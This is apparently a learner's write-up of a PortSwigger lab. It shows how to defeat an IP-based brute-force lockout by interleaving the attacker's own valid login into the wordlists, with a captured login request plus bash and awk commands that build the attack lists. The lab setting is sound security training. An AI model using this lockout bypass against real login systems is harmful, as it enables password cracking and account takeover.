PortSwigger Lab: Broken brute-force protection, IP block
Task
This lab is vulnerable due to a logic flaw in its password brute-force protection. To solve the lab, brute-force the victim’s password, then log in and access their account page.
- Your credentials:
wiener:peter - Victim’s username:
carlos - Candidate passwords
#### Hint
Advanced users may want to solve this lab by using a macro or the Turbo Intruder extension. However, it is possible to solve the lab without using these advanced features.
Attempt
I usually use ffuf for this kind of stuff but this time I wanted to get used to burp’s intruder.
Logged in as wiener and captured the request:
POST /login HTTP/2
Host: ID.web-security-academy.net
Cookie: session=VALUE
Content-Length: 30
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Origin: https://ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://ID.web-security-academy.net/login
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
username=wiener&password=peter
Before starting brute-forcing, I tried if I can directory change the value of the id parameter in this request:
GET /my-account?id=wiener
This didn’t work and sent me back to the login page.
I created a wordlist from the PortSwigger password list and started a brute-force attack using Intruder. There was rate-limiting and I got blocked, You have made too many incorrect login attempts. Please try again in 1 minute(s). Now I need to bypass this restriction.
After logging in as wiener again, I noticed the rate limit is reset. First I thought a successful login lifted the temporary ban but after some trials I found a successful login before getting banned would reset the counter.
So I need a username wordlist like this:
carlos
carlos
wiener
carlos
...
Quickly made a wordlist with bash:
for i in {1..50}; do echo "carlos"; echo "carlos"; echo "wiener"; done > carlos.dict
I also I needed to modify the password wordlist too:
awk '{print; if (NR % 2 == 0) print "peter";}' pass.dict > pass2.dict
Using pitchfork, I set each file for the corresponding position and started cracking. Found the credentials carlos:robert.